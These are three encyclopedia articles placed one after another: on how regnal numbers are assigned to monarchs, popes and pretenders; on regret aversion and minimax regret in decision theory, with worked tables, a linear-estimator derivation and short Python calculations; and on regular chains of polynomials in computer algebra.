It is common to start counting either since the beginning of the monarchy, or since the beginning of a particular line of state succession. For example, Boris III of Bulgaria and his son Simeon II were given their regnal numbers because the medieval rulers of the First and Second Bulgarian Empire were counted as well, although the recent dynasty dates only back to 1878 and is only distantly related to the monarchs of previous Bulgarian states. [ 1 ] On the other hand, the kings of England and kings of Great Britain and the United Kingdom are counted starting with the Norman Conquest . That is why the son of Henry III of England is called Edward I , even though there were three English monarchs named Edward before the Conquest (they were distinguished by epithets instead).
Sometimes legendary or fictional persons are included. For example, the Swedish kings Eric XIV (reigned 1560–68) and Charles IX (1604–11) took ordinals based on a fanciful 1544 history by Johannes Magnus , which invented six kings of each name before those accepted by later historians. [ 2 ] A list of Swedish monarchs, represented on the map of the Estates of the Swedish Crown, [ 3 ] produced by French engraver Jacques Chiquet [ fr ] (1673–1721) and published in Paris in 1719, starts with Canute I and shows Eric XIV and Charles IX as Eric IV and Charles II respectively; the only Charles holding his traditional ordinal in the list is Charles XII . Also, in the case of Emperor Menelik II of Ethiopia, he chose his regnal number with reference to a mythical ancestor and first sovereign of his country (a supposed son of biblical King Solomon ) to underline his legitimacy into the so-called Solomonic dynasty . [ 4 ]
Monarchs with the same given name are distinguished by their ordinals:
Ordinals may also apply where a ruler of one realm and a ruler of that realm's successor state share the same name:
Practice varies where monarchs go by two or more given names . For Swedish monarchs , the ordinal qualifies only the first name; for example, Gustav VI Adolf , known as "Gustav Adolf", was the sixth Gustav/Gustaf, but the third Gustav Adolf. By contrast, the Kingdom of Prussia was ruled in turn by Friedrich I , Friedrich Wilhelm I , Friedrich II , and Friedrich Wilhelm II ; and later by Wilhelm I . Likewise, Pope John Paul I chose his double name to honour his predecessors John XXIII and Paul VI , and was succeeded by John Paul II .
In any case, it is usual to count only the monarchs or heads of the family, and to number them sequentially up to the end of the dynasty. [ citation needed ] A notable exception to this rule is the German House of Reuss . This family has the particularity that every male member during the last eight centuries was named Heinrich, and all of them, not only the head of the family, were numbered. While the members of the elder branch were numbered in order of birth until the extinction of the branch in 1927, [ 5 ] the members of the younger line were (and still are) numbered in sequences that began and ended roughly as centuries began and ended. [ 6 ] This explains why the current (since 2012) head of the Reuss family is called Heinrich XIV, his late father Heinrich IV and his sons Heinrich XXIX and Heinrich V.
It is rare, but some German princely families number all males whether head of the family or not; for example, Hans Heinrich XV von Hochberg was preceded as Prince of Pless by Hans Heinrich XI and succeeded by Hans Heinrich XVII; the ordinals XII, XIII, XIV, and XVI were borne by von Hochbergs who were not Prince of Pless. Similarly for the House of Reuss , where all men were numbered Heinrichs and some were reigning Princes of Reuss-Gera or Reuss-Greiz .
Pretenders and rulers of formerly deposed dynasties are often given regnal numbers as if non-reigning pretenders had actually ruled . For example Louis XVIII of France took a regnal number that implicitly asserts that Louis XVII had been king, though he never reigned; his pretendership was during the First French Republic . A similar case is that of Napoleon III whose regnal number implicitly asserts a ruling Napoleon II . Louis XVIII numbered his regnal year from the death of Louis XVII, something Napoleon III never did.
Almost all West European monarchs and popes after medieval times have used ordinals. Ordinals are also retrospectively applied to earlier monarchs in most works of reference, at least insofar as they are not easy to distinguish from each other by any other systematic means. In several cases, various sorts of "semi-regnal" members of dynasties are also numbered, to make them easier to identify in works of reference – in cases such as co-regents, crown princes, succession-conveying consorts , prime ministers and deputy monarchs. In the first centuries after the Middle Ages, the use was sometimes sporadic, but became established by the 18th century. In the past couple of centuries, European monarchs without an official ordinal have been rarities.
As a rule of thumb, medieval European monarchs did not use ordinals in their own time; those who did were rarities, and even their use was sporadic. Ordinals for monarchs before the 13th century are anachronisms , as are ordinals for almost all later medieval monarchs. Still, they are often used, because they are a practical way of distinguishing between different historical monarchs who had the same name.
Popes were apparently the first to assume official ordinals for their reigns, although this occurred only in the last centuries of the Middle Ages. It is clear, from renumberings of Popes John XV–XIX and Popes Stephen II–IX, that as of the 11th century the popes did not yet use established ordinals. The official, self-confirmed numbering of John XXI means that at latest from the 13th century the popes did take official ordinals in their accession.
Emperor Frederick II , King Charles II of Naples and King Premislas II of Poland evidently used ordinals sometimes during their reigns, whereas most of their contemporary monarchs did not. In the 14th century, Emperor Charles IV sometimes used that ordinal. Presumably, the use of the ordinal of King Frederick III of Sicily is also contemporaneous. The royal chroniclers of the Abbey of Saint-Denis were using ordinals to refer to the French kings as early as the thirteenth century, with the practice entering common usage among royalty and the nobility by the late fourteenth century. The British tradition of consistently and prevalently numbering monarchs dates back to Henry VIII and Mary I ; however, sporadic use occurred at least as early as the reign of Edward III .
The long history of the papacy has led to difficulties in some cases. For example, Stephen was only pope for three days before dying of apoplexy , and was never consecrated. Because not all list-makers count him as having been pope (as Stephen II ), there has been some confusion in regard to later popes who chose the name Stephen. Later Stephens are sometimes numbered with parentheses, e.g., his immediate successor (in name) is denoted either Stephen (II) III or Stephen III (II). The church did consider Stephen II a pope until he was removed from the list of popes in 1961. The history of the numbering of popes taking the regnal name "John" is even more convoluted, owing to the long history of popes taking the name (a common name, chosen frequently to honour the Apostle ), bad record-keeping, and political confusion; among other results, the regnal name "John XX" is completely skipped under all reckonings.
In the case of personal unions , some monarchs have had more than one ordinal, because they had different ordinals in their different realms. For instance, Charles XV of Sweden was also king of Norway, but in Norway he went under the name Charles IV. The Swedish-Norwegian union was in force 1814–1905 and both realms had had kings called Charles before the union, but Sweden had had more kings by that name.
In the event of one kingdom achieving independence from another but retaining the same monarch, the monarch often retains the same number as was already used in the older realm. King Christian X of Denmark thus became King Christian X of Iceland when Iceland became an independent kingdom in personal union with Denmark in 1918. The same is true for Commonwealth realms , where the monarch retains the regnal number from the British line of monarchs (see below).
Beginning in 1603, when England and Scotland began to share a monarch but were still legally separate realms, their monarchs were numbered separately. The king who began the personal union was James VI of Scotland who was also James I of England, and his name is often written (especially in Scotland) as James VI and I . Similarly, his grandson is James VII and II . Mary II 's ordinal coincidentally relates to both her predecessors Mary I of England and Mary I of Scotland ; her co-sovereign husband is William III and II (here the English number is first). Charles I and Charles II had a name not used in either country before 1603.
After the realms were united with the Acts of Union 1707 , separate numbers were not needed for the next five monarchs: Anne and the four Georges. However, when William IV acceded in 1830, he was not called William III in Scotland. [ citation needed ] ( George Croly pointed out in 1830 the new king was William I, II, III, and IV: of Hanover , Ireland, Scotland, and England respectively. [ 7 ] ) Nor were Edward VII and Edward VIII known as Edward I and Edward II (or possibly II and III, if one counts the disputed reign of Edward Balliol ) of Scotland. These kings all followed the numbering consistent with the English sequence of sovereigns (which, incidentally, was also the higher of the two numbers in all occurring cases). This was not without controversy in Scotland, however; for example, Edward VII's regnal number was occasionally omitted in Scotland, even by the established Church of Scotland , in deference to protests that the previous Edwards were English kings who had "been excluded from Scotland by battle". [ 8 ]
The issue arose again with the accession of Queen Elizabeth II , as Scotland had never before had a regnant Queen Elizabeth, the previous queen of that name having been queen of England only. Objections were raised, and sustained, to the use of the royal cypher E II R anywhere in Scotland, resulting in several violent incidents, including the destruction of one of the first new E II R pillar boxes in Scotland, at Leith in late 1952. Since that time, the cipher used in Scotland on all government and Crown property and street furniture has carried no lettering, but simply the Crown of Scotland from the Honours of Scotland . A court case, MacCormick v Lord Advocate , contesting the style "Elizabeth II" within Scotland, was decided in 1953 on the grounds that the numbering of monarchs was part of the royal prerogative , and that the plaintiffs had no title to sue the Crown .
To rationalise this usage, it was suggested by Winston Churchill , the Prime Minister of the day, that in future, the higher of the two numerals from the English and Scottish sequences would always be used. [ 9 ] This had been the case de facto since the Acts of Union 1707 ; nine of the thirteen monarchs since the Act had names either never previously used in England or Scotland (Anne, six Georges, and Victoria) or used in both only after the 1603 Union of Crowns (three Charleses), which sidestepped the issue, while the English numbers for the remaining four monarchs' names have consistently been both higher and the ones used (William, two Edwards, and Elizabeth). Under the Churchill rule, if a future British monarch were to use the regnal name Alexander , even though there has never been a King of England of that regnal name, they would be Alexander IV, there having been three Kings Alexander of Scotland (reigning 1107–1124, 1214–1249, and 1249–1286).
As the Lordship of Ireland (1171–1542) and Kingdom of Ireland (1542–1800) were subordinate to the Kingdom of England , the English ordinals were used in Ireland even before the Acts of Union 1800 . William III of England and William IV of the United Kingdom were still called "William III" and "William IV" in Ireland, even though neither William I nor William II ruled any part of Ireland. Similarly, the various Kings Henry are numbered II–VIII as they are in England even though Henry I of England never ruled any part of Ireland. Elizabeth I of England is referred to in Irish regnal year legal citations as "Elizabeth" rather than "Elizabeth I" because Ireland became a republic before Elizabeth II became queen. [ 10 ]
In some monarchies it is customary not to use an ordinal when there has been only one holder of that name. For example, Queen Victoria will not be called Victoria I unless there is a Victoria II. This tradition is applied in the United Kingdom , Belgium , Luxembourg , Norway and the Netherlands . It was also applied in most of the former German monarchies and in Hungary .
In Sweden and in the Vatican City State, the practice is not consistent. In Sweden, Sigismund and Adolf Frederick never have ordinals, whereas Frederick I often does. In the Vatican, John Paul I used an ordinal, but Francis refused to have one added to his name.
Other monarchies assign ordinals to monarchs even if they are the only ones of their name. This is a more recent invention and appears to have been done for the first time when Francis I of France issued testoons (silver coins) bearing the legend FRANCISCVS I DE. GR. FRANCORV. REX. This currently is the regular practice in Spain and Monaco (at least for Prince Albert I, as Princess Louise Hippolyte, who reigned 150 years earlier, does not appear to have used an ordinal). It was also applied in Brazil , Greece , Italy , Mexico , Montenegro , Portugal (where Kings Joseph , Louis and Charles are usually referred to as "Joseph I", "Louis I" and "Charles I" although there has not yet been any Joseph II, Louis II or Charles II, but Kings Denis , Edward , Sebastian and Henry are usually referred without the ordinal). The ordinal for King Juan Carlos I of Spain is used in both Spanish and English, but he is sometimes simply called King Juan Carlos of Spain in English. In Russia , use of "The First" ordinal started with Paul I of Russia . Before him, neither Anna of Russia nor Elizabeth of Russia had the "I" ordinal. In Ethiopia , Emperor Haile Selassie used the "I" ordinal ( Ge'ez : ቀዳማዊ , qädamawi ) although previous Ethiopian monarchs had not used it, and they are not referred as "the first" unless there were successors of the same name.
The Catholic papacy used the ordinal I under Pope John Paul I , but early popes who are the only ones to have reigned under a certain name are not referred to as "the first" (for instance, Peter the Apostle; his immediate successor, Pope Linus , as well as Pope Anacletus , are referred to without an ordinal). The most recent, Pope Francis (2013–2025), declined the use of an ordinal, but his Orthodox counterpart, Patriarch Bartholomew I of Constantinople , uses one, as does Aram I , the catholicos of the Armenian Apostolic Church .
In Austria , Emperors Francis , Ferdinand , Francis Joseph and Charles all styled themselves as "the first" although all were the only Emperors of Austria with those names. Three of those names were previously the names of Austrian Archdukes (the Archduchy of Austria was a state within the Holy Roman and the Austrian Empires), which makes three of these emperors Francis II, Ferdinand V, and Charles IV in their capacity as Archdukes. Francis Joseph was the first Austrian Archduke of that name.
The use of "The First" ordinal is also common to self-proclaimed ephemeral "kings" or "emperors", such as Napoleon I in France ; Dessalines , Christophe and Soulouque in Haiti ; Iturbide in Mexico ; Zog in Albania ; Bokassa in the Central African Empire ; Skossyreff in Andorra ; Theodore in Corsica ; and "Emperor" Norton in San Francisco . In those cases, they wanted to emphasize the change of regime they introduced or attempted to introduce.
It is traditional amongst French monarchists to continue to number their pretenders even though they have never reigned. Hence, a supporter of the late Comte de Paris would have referred to him as Henri VII even though only four men named "Henri" have been King of France .
Non-consecutive ordinals may indicate dynastic claims for non-regnant monarchs. For example, after Louis XVI of France was executed during the French Revolution , legitimists consider him to have been succeeded by his young son, whom they called Louis XVII . Although the child died in prison a few years later and never reigned, his uncle, who came to the French throne in the Bourbon Restoration , took the name Louis XVIII in acknowledgement of his dynasty's rights. Similarly, after Emperor Napoleon I 's regime collapsed, he abdicated in favour of his four-year-old son, who was proclaimed Napoleon II . The young emperor was deposed only weeks later by Napoleon's European rivals and was never recognized internationally; but when his first cousin Louis Napoleon Bonaparte proclaimed himself Emperor in 1852, he declared himself Napoleon III in recognition of his predecessor.
Following the Glorious Revolution , a line of pretenders descended from the dethroned James VII and II claimed the throne and declared themselves to be James VIII and III , Charles III and Henry IX and I . They numbered themselves separately for Scotland and England because they did not recognize the Acts of Union , which joined the two kingdoms into one in 1707, as valid.
James VII's last legitimate descendant died in 1807, and the claim passed to descendants of his sister Henrietta , Duchess of Orléans. Although none of them has actively claimed the throne, their supporters have assigned them the regnal numbers that they "should have had"; for example, from 1919 to 1955, the claim was held by "Robert I & IV" , which was numbered for England and Scotland respectively.
This custom is currently unique to French and British (Jacobite) monarchists; monarchists from other nations do not usually use regnal numbers for the pretenders they support.
While reigning monarchs use ordinals, ordinals are not used for royal female consorts. Thus, while King George V used an ordinal to distinguish him from other kings of the United Kingdom called George, his wife, Queen Mary , had no ordinal.
The lack of an ordinal in the case of royal consorts complicates the recording of history, as there may be a number of consorts over time with the same name with no way to distinguish between them. For that reason, royal consorts are sometimes recorded after their deaths in history books and encyclopaedias by the use of their premarital name or, if they were from royalty or sovereign nobility, the name of the dynasty or the country. For example, Henry VIII of England 's fifth wife, Katherine Howard (of noble but not sovereign ancestry), is known by her maiden surname, George V 's wife (a descendant of the sovereign ducal house of Württemberg) is commonly known as Mary of Teck (after her father's title), and Edward VII 's wife (a daughter of the King of Denmark) is known as Alexandra of Denmark . | https://en.wikipedia.org/wiki/Regnal_number
In decision theory , regret aversion (or anticipated regret ) describes how the human emotional response of regret can influence decision-making under uncertainty . When individuals make choices without complete information, they often experience regret if they later discover that a different choice would have produced a better outcome. This regret can be quantified as the difference in value between the actual decision made and what would have been the optimal decision in hindsight.
Unlike traditional models that consider regret as merely a post-decision emotional response, the theory of regret aversion proposes that decision-makers actively anticipate potential future regret and incorporate this anticipation into their current decision-making process. This anticipation can lead individuals to make choices specifically designed to minimize the possibility of experiencing regret later, even if those choices are not optimal from a purely probabilistic expected-value perspective.
Regret is a powerful negative emotion with significant social and reputational implications, playing a central role in how humans learn from experience and in the psychology of risk aversion . The conscious anticipation of regret creates a feedback loop that elevates regret from being simply an emotional reaction—often modeled as mere human behavior —into a key factor in rational choice behavior that can be formally modeled in decision theory.
This anticipatory mechanism helps explain various observed decision patterns that deviate from standard expected utility theory , including status quo bias , inaction inertia, and the tendency to avoid decisions that might lead to easily imagined counterfactual scenarios where a better outcome would have occurred.
Regret theory is a model in theoretical economics simultaneously developed in 1982 by Graham Loomes and Robert Sugden , [ 1 ] David E. Bell, [ 2 ] and Peter C. Fishburn . [ 3 ] Regret theory models choice under uncertainty taking into account the effect of anticipated regret. Subsequently, several other authors improved upon it. [ 4 ]
It incorporates a regret term in the utility function which depends negatively on the realized outcome and positively on the best alternative outcome given the uncertainty resolution. This regret term is usually an increasing, continuous and non-negative function subtracted from the traditional utility index. These types of preferences always violate transitivity in the traditional sense, [ 5 ] although most satisfy a weaker version. [ 4 ]
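One way to make this structure concrete is the following sketch, which captures the general shape just described rather than the exact functional of any of the cited papers; here u is a traditional utility index, R is the regret function, x_A(s) is the realized outcome of the chosen action A in state s, and x_B(s) is the outcome of the best foregone alternative in that state:

```latex
% Sketch only: the exact formulations of Loomes-Sugden, Bell and Fishburn differ in detail.
% u : traditional utility index
% R : increasing, continuous, non-negative regret function with R(0) = 0
% x_A(s), x_B(s) : realized outcome of the chosen action A, and best foregone
%                  alternative outcome, once the uncertainty resolves to state s
\[
  U(A \mid s) = u\bigl(x_A(s)\bigr) - R\Bigl(u\bigl(x_B(s)\bigr) - u\bigl(x_A(s)\bigr)\Bigr),
  \qquad
  \mathbb{E}\bigl[U(A)\bigr] = \sum_{s} p(s)\, U(A \mid s).
\]
```

An action A is then preferred to B when its regret-adjusted expected utility is higher, which is why such preferences can fail transitivity even when the underlying index u is well behaved.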
For independent lotteries, when regret is evaluated over the difference between utilities and then averaged over all combinations of outcomes, regret preferences can still be transitive, but only for a specific form of the regret functional. It has been shown that only the hyperbolic sine function maintains this property. [ 6 ] This form of regret inherits most of the desired features, such as respecting first order stochastic dominance , risk aversion for logarithmic utilities and the ability to explain the Allais paradox .
Regret aversion is not only a theoretical economics model, but also a cognitive bias that occurs when a decision is made in order to avoid regretting an alternative decision. In other words, regret aversion can be seen as fear of either commission or omission: the prospect of committing to a failure, or of missing an opportunity, both of which we seek to avoid. [ 7 ] Regret, the feeling of sadness or disappointment over something that has happened, can be rationalized for a given decision, but it can also guide preferences and lead people astray. This can contribute to the spread of disinformation, because outcomes are not seen as one's personal responsibility.
Several experiments over both incentivized and hypothetical choices attest to the magnitude of this effect.
Experiments in first price auctions show that, by manipulating the feedback the participants expect to receive, significant differences in the average bids are observed. [ 8 ] In particular, "loser's regret" can be induced by revealing the winning bid to all participants in the auction, and thus revealing to the losers whether they would have been able to make a profit and how much it could have been (a participant who has a valuation of $50, bids $30 and finds out the winning bid was $35 will also learn that he or she could have earned as much as $15 by bidding anything over $35). This in turn allows for the possibility of regret, and if bidders correctly anticipate this, they will tend to bid higher than in the case where no feedback on the winning bid is provided, in order to decrease the possibility of regret.
In decisions over lotteries, experiments also provide supporting evidence of anticipated regret. [ 9 ] [ 10 ] [ 11 ] As in the case of first price auctions, differences in feedback over the resolution of the uncertainty can cause the possibility of regret and if this is anticipated, it may induce different preferences.
For example, when faced with a choice between $40 with certainty and a coin toss that pays $100 if the outcome is guessed correctly and $0 otherwise, not only does the certain payment alternative minimize the risk, but it also minimizes the possibility of regret, since typically the coin will not be tossed (and thus the uncertainty is not resolved), while if the coin toss is chosen, the outcome that pays $0 will induce regret. If the coin is tossed regardless of the chosen alternative, then the alternative payoff will always be known, and then there is no choice that will eliminate the possibility of regret.
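The effect of the feedback rule on anticipated regret can be made concrete with a short script. This is purely an illustrative sketch: the payoffs are those of the example above, while the fair coin, the linear utility and the regret term (the shortfall relative to the best foregone alternative in the realized state) are assumptions made only for the illustration.

```python
# Anticipated regret for the "$40 for sure vs. coin toss" example.
# Assumptions: fair coin, linear utility, regret = shortfall vs. the forgone alternative.

states = {"guess correct": 0.5, "guess wrong": 0.5}
payoff = {
    "sure thing": {"guess correct": 40, "guess wrong": 40},
    "coin toss": {"guess correct": 100, "guess wrong": 0},
}

def expected_regret(choice, coin_tossed_anyway):
    """Average shortfall versus the alternative, under the given feedback rule."""
    other = "coin toss" if choice == "sure thing" else "sure thing"
    total = 0.0
    for state, prob in states.items():
        if choice == "sure thing" and not coin_tossed_anyway:
            # The coin is never tossed, so the forgone payoff is never revealed.
            shortfall = 0.0
        else:
            shortfall = max(payoff[other][state] - payoff[choice][state], 0.0)
        total += prob * shortfall
    return total

for feedback in (False, True):
    for choice in ("sure thing", "coin toss"):
        print(feedback, choice, expected_regret(choice, feedback))
```

With no forced toss, choosing the sure payment yields zero anticipated regret; once the coin is tossed regardless of the choice, both options carry positive anticipated regret, matching the discussion above.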
Anticipated regret tends to be overestimated for both choices and actions over which people perceive themselves to be responsible. [ 12 ] [ 13 ] People are particularly likely to overestimate the regret they will feel when missing a desired outcome by a narrow margin. In one study, commuters predicted they would experience greater regret if they missed a train by 1 minute than if they missed it by 5 minutes, for example, but commuters who actually missed their train by 1 or 5 minutes experienced similar, and lower than predicted, amounts of regret. Commuters appeared to overestimate the regret they would feel when missing the train by a narrow margin, because they tended to underestimate the extent to which they would attribute missing the train to external causes (e.g., missing their wallet or spending less time in the shower). [ 12 ]
Besides the traditional setting of choices over lotteries, regret aversion has been proposed as an explanation for the typically observed overbidding in first price auctions, [ 14 ] and the disposition effect , [ 15 ] among others.
The minimax regret approach is to minimize the worst-case regret, originally presented by Leonard Savage in 1951. [ 16 ] The aim of this is to perform as closely as possible to the optimal course. Since the minimax criterion applied here is to the regret (difference or ratio of the payoffs) rather than to the payoff itself, it is not as pessimistic as the ordinary minimax approach. Similar approaches have been used in a variety of areas such as:
One benefit of minimax (as opposed to expected regret) is that it is independent of the probabilities of the various outcomes: thus if regret can be accurately computed, one can reliably use minimax regret. However, probabilities of outcomes are hard to estimate.
This differs from the standard minimax approach in that it uses differences or ratios between outcomes, and thus requires interval or ratio measurements, as well as ordinal measurements (ranking), as in standard minimax.
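In symbols, and as a generic sketch rather than a formula quoted from the sources above, writing u(a, s) for the payoff of action a when the state of nature is s:

```latex
% Regret of an action a in state s, and the minimax regret choice a*.
\[
  \operatorname{regret}(a, s) = \max_{a'} u(a', s) - u(a, s),
  \qquad
  a^{*} = \arg\min_{a} \max_{s} \operatorname{regret}(a, s).
\]
```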
Suppose an investor has to choose between investing in stocks, bonds or the money market, and the total return depends on what happens to interest rates. The following table shows some possible returns:

                        Interest rates rise   Static rates   Interest rates fall   Worst return   Best return
  Stocks                        −4                  4                12                 −4             12
  Bonds                         −2                  3                 8                 −2              8
  Money market                   3                  2                 1                  1              3
  Best available return          3                  4                12
The crude maximin choice based on returns would be to invest in the money market, ensuring a return of at least 1. However, if interest rates fell then the regret associated with this choice would be large. This would be 11, which is the difference between the 12 which could have been received if the outcome had been known in advance and the 1 received. A mixed portfolio of about 11.1% in stocks and 88.9% in the money market would have ensured a return of at least 2.22; but, if interest rates fell, there would be a regret of about 9.78.
The regret table for this example, constructed by subtracting actual returns from best returns, is as follows:

                        Interest rates rise   Static rates   Interest rates fall   Worst regret
  Stocks                         7                  0                 0                  7
  Bonds                          5                  1                 4                  5
  Money market                   0                  2                11                 11
Therefore, using a minimax choice based on regret, the best course would be to invest in bonds, ensuring a regret of no worse than 5. A mixed investment portfolio would do even better: 61.1% invested in stocks, and 38.9% in the money market would produce a regret no worse than about 4.28.
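These figures are easy to reproduce with a short script. The following sketch is only illustrative: it takes the returns table above as given and checks the pure minimax-regret choice as well as the worst-case regret of the two mixed portfolios quoted in the text.

```python
import numpy as np

# Rows: stocks, bonds, money market.  Columns: rates rise, static, fall.
returns = np.array([
    [-4.0, 4.0, 12.0],   # stocks
    [-2.0, 3.0,  8.0],   # bonds
    [ 3.0, 2.0,  1.0],   # money market
])
names = ["stocks", "bonds", "money market"]

best_per_state = returns.max(axis=0)      # best achievable return in each state
regret = best_per_state - returns         # regret table
worst_regret = regret.max(axis=1)         # worst-case regret of each pure choice

print(dict(zip(names, worst_regret)))     # bonds have the smallest worst-case regret: 5

def worst_case_regret(weights):
    """Worst-case regret of a portfolio given as weights over the three assets."""
    portfolio_returns = weights @ returns
    return (best_per_state - portfolio_returns).max()

# Mixed portfolios mentioned in the text.
print(worst_case_regret(np.array([0.111, 0.0, 0.889])))   # about 9.78
print(worst_case_regret(np.array([0.611, 0.0, 0.389])))   # about 4.28
```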
What follows is an illustration of how the concept of regret can be used to design a linear estimator .
In this example, the problem is to construct a linear estimator of a finite-dimensional parameter vector x {\displaystyle x} from its noisy linear measurement with known noise covariance structure. The loss of reconstruction of x {\displaystyle x} is measured using the mean-squared error (MSE). The unknown parameter vector is known to lie in an ellipsoid E {\displaystyle E} centered at zero. The regret is defined to be the difference between the MSE of the linear estimator that doesn't know the parameter x {\displaystyle x} , and the MSE of the linear estimator that knows x {\displaystyle x} . Also, since the estimator is restricted to be linear, the zero MSE cannot be achieved in the latter case. In this case, the solution of a convex optimization problem gives the optimal, minimax regret-minimizing linear estimator, which can be seen by the following argument.
According to the assumptions, the observed vector y {\displaystyle y} and the unknown deterministic parameter vector x {\displaystyle x} are tied by the linear model y = H x + w , {\displaystyle y=Hx+w,}
where H {\displaystyle H} is a known n × m {\displaystyle n\times m} matrix with full column rank m {\displaystyle m} , and w {\displaystyle w} is a zero mean random vector with a known covariance matrix C w {\displaystyle C_{w}} .
Let x ^ = G y {\displaystyle {\hat {x}}=Gy}
be a linear estimate of x {\displaystyle x} from y {\displaystyle y} , where G {\displaystyle G} is some m × n {\displaystyle m\times n} matrix. The MSE of this estimator is given by M S E = E ‖ x ^ − x ‖ 2 = ‖ ( I − G H ) x ‖ 2 + T r ( G C w G T ) . {\displaystyle \mathrm {MSE} =E\left\|{\hat {x}}-x\right\|^{2}=\left\|(I-GH)x\right\|^{2}+\mathrm {Tr} \left(GC_{w}G^{T}\right).}
Since the MSE depends explicitly on x {\displaystyle x} it cannot be minimized directly. Instead, the concept of regret can be used in order to define a linear estimator with good MSE performance. To define the regret here, consider a linear estimator that knows the value of the parameter x {\displaystyle x} , i.e., the matrix G {\displaystyle G} can explicitly depend on x {\displaystyle x} : x ^ o = G ( x ) y . {\displaystyle {\hat {x}}^{o}=G(x)y.}
The MSE of x ^ o {\displaystyle {\hat {x}}^{o}} is M S E o = ‖ ( I − G ( x ) H ) x ‖ 2 + T r ( G ( x ) C w G ( x ) T ) . {\displaystyle \mathrm {MSE} ^{o}=\left\|(I-G(x)H)x\right\|^{2}+\mathrm {Tr} \left(G(x)C_{w}G(x)^{T}\right).}
To find the optimal G ( x ) {\displaystyle G(x)} , M S E o {\displaystyle MSE^{o}} is differentiated with respect to G {\displaystyle G} and the derivative is set equal to zero, giving G ( x ) = x x T H T ( H x x T H T + C w ) − 1 . {\displaystyle G(x)=xx^{T}H^{T}\left(Hxx^{T}H^{T}+C_{w}\right)^{-1}.}
Then, using the Matrix Inversion Lemma , G ( x ) = x x T H T C w − 1 1 + x T H T C w − 1 H x . {\displaystyle G(x)={\frac {xx^{T}H^{T}C_{w}^{-1}}{1+x^{T}H^{T}C_{w}^{-1}Hx}}.}
Substituting this G ( x ) {\displaystyle G(x)} back into M S E o {\displaystyle MSE^{o}} , one gets M S E o = x T x 1 + x T H T C w − 1 H x . {\displaystyle \mathrm {MSE} ^{o}={\frac {x^{T}x}{1+x^{T}H^{T}C_{w}^{-1}Hx}}.}
This is the smallest MSE achievable with a linear estimate that knows x {\displaystyle x} . In practice this MSE cannot be achieved, but it serves as a bound on the optimal MSE. The regret of using the linear estimator specified by G {\displaystyle G} is equal to R ( x , G ) = M S E − M S E o = ‖ ( I − G H ) x ‖ 2 + T r ( G C w G T ) − x T x 1 + x T H T C w − 1 H x . {\displaystyle R(x,G)=\mathrm {MSE} -\mathrm {MSE} ^{o}=\left\|(I-GH)x\right\|^{2}+\mathrm {Tr} \left(GC_{w}G^{T}\right)-{\frac {x^{T}x}{1+x^{T}H^{T}C_{w}^{-1}Hx}}.}
The minimax regret approach here is to minimize the worst-case regret, i.e., sup x ∈ E R ( x , G ) . {\displaystyle \sup _{x\in E}R(x,G).} This will allow a performance as close as possible to the best achievable performance in the worst case of the parameter x {\displaystyle x} . Although this problem appears difficult, it is an instance of convex optimization and in particular a numerical solution can be efficiently calculated. [ 17 ] Similar ideas can be used when x {\displaystyle x} is random with uncertainty in the covariance matrix . [ 18 ] [ 19 ]
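The quantities above are straightforward to evaluate numerically. The following sketch is only an illustration under the stated model assumptions (it draws a random instance rather than solving the full worst-case convex program): it checks the closed-form oracle MSE against the constructed G(x), and computes the regret of an ordinary least-squares estimator.

```python
import numpy as np

rng = np.random.default_rng(0)
n, m = 5, 3
H = rng.standard_normal((n, m))            # known model matrix
A = rng.standard_normal((n, n))
C_w = A @ A.T + np.eye(n)                  # noise covariance, positive definite
x = rng.standard_normal(m)                 # one particular value of the parameter

def mse(G):
    """MSE of the linear estimate Gy for the deterministic parameter x."""
    bias = (np.eye(m) - G @ H) @ x
    return bias @ bias + np.trace(G @ C_w @ G.T)

# Oracle estimator that is allowed to depend on x, and its MSE in closed form.
Hx = H @ x
alpha = Hx @ np.linalg.solve(C_w, Hx)                       # x^T H^T C_w^{-1} H x
G_x = np.outer(x, np.linalg.solve(C_w, Hx)) / (1 + alpha)   # optimal G(x)
mse_oracle = x @ x / (1 + alpha)

print(np.isclose(mse(G_x), mse_oracle))    # True: the closed form matches
G_ls = np.linalg.pinv(H)                   # ordinary least-squares estimator
print(mse(G_ls) - mse_oracle)              # its regret R(x, G_ls), non-negative
```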
Camara, Hartline and Johnsen [ 20 ] study principal-agent problems . These are incomplete-information games between two players called Principal and Agent , whose payoffs depend on a state of nature known only by the Agent. The Principal commits to a policy, then the agent responds, and then the state of nature is revealed. They assume that the principal and agent interact repeatedly, and may learn over time from the state history, using reinforcement learning . They assume that the agent is driven by regret-aversion. In particular, the agent minimizes his counterfactual internal regret . Based on this assumption, they develop mechanisms that minimize the principal's regret.
Collina, Roth and Shao [ 21 ] improve their mechanism both in running-time and in the bounds for regret (as a function of the number of distinct states of nature). | https://en.wikipedia.org/wiki/Regret_(decision_theory) |
In mathematics , and more specifically in computer algebra and elimination theory , a regular chain is a particular kind of triangular set of multivariate polynomials over a field, where a triangular set is a finite sequence of polynomials such that each one contains at least one more indeterminate than the preceding one. The condition that a triangular set must satisfy to be a regular chain is that, for every k , every common zero (in an algebraically closed field ) of the first k polynomials may be extended to a common zero of the ( k + 1) th polynomial. In other words, regular chains allow solving systems of polynomial equations by solving successive univariate equations without considering different cases.
Regular chains enhance the notion of Wu's characteristic sets in the sense that they provide a better result with a similar method of computation.
Given a linear system , one can convert it to a triangular system via Gaussian elimination . For the non-linear case, given a polynomial system F over a field, one can convert (decompose or triangularize) it to a finite set of triangular sets, in the sense that the algebraic variety V (F) is described by these triangular sets.
A triangular set may merely describe the empty set. To fix this degenerate case, the notion of regular chain was introduced, independently by Kalkbrener (1993) and by Yang and Zhang (1994). Regular chains also appear in Chou and Gao (1992). Regular chains are special triangular sets which are used in different algorithms for computing unmixed-dimensional decompositions of algebraic varieties. Without using factorization, these decompositions have better properties than the ones produced by Wu's algorithm . Kalkbrener's original definition was based on the following observation: every irreducible variety is uniquely determined by one of its generic points and varieties can be represented by describing the generic points of their irreducible components. These generic points are given by regular chains.
Denote by Q the rational number field. In Q [ x 1 , x 2 , x 3 ] with variable ordering x 1 < x 2 < x 3 , the set T = { x 2 2 − x 1 2 , x 2 x 3 − x 1 x 2 } {\displaystyle T=\{x_{2}^{2}-x_{1}^{2},\;x_{2}x_{3}-x_{1}x_{2}\}}
is a triangular set and also a regular chain. Two generic points given by T are ( a , a , a ) and ( a , − a , a ) where a is transcendental over Q .
Thus there are two irreducible components, given by { x 2 − x 1 , x 3 − x 1 } and { x 2 + x 1 , x 3 − x 1 } , respectively.
Note that: (1) the content of the second polynomial is x 2 , which does not contribute to the generic points represented and thus can be removed; (2) the dimension of each component is 1, the number of free variables in the regular chain.
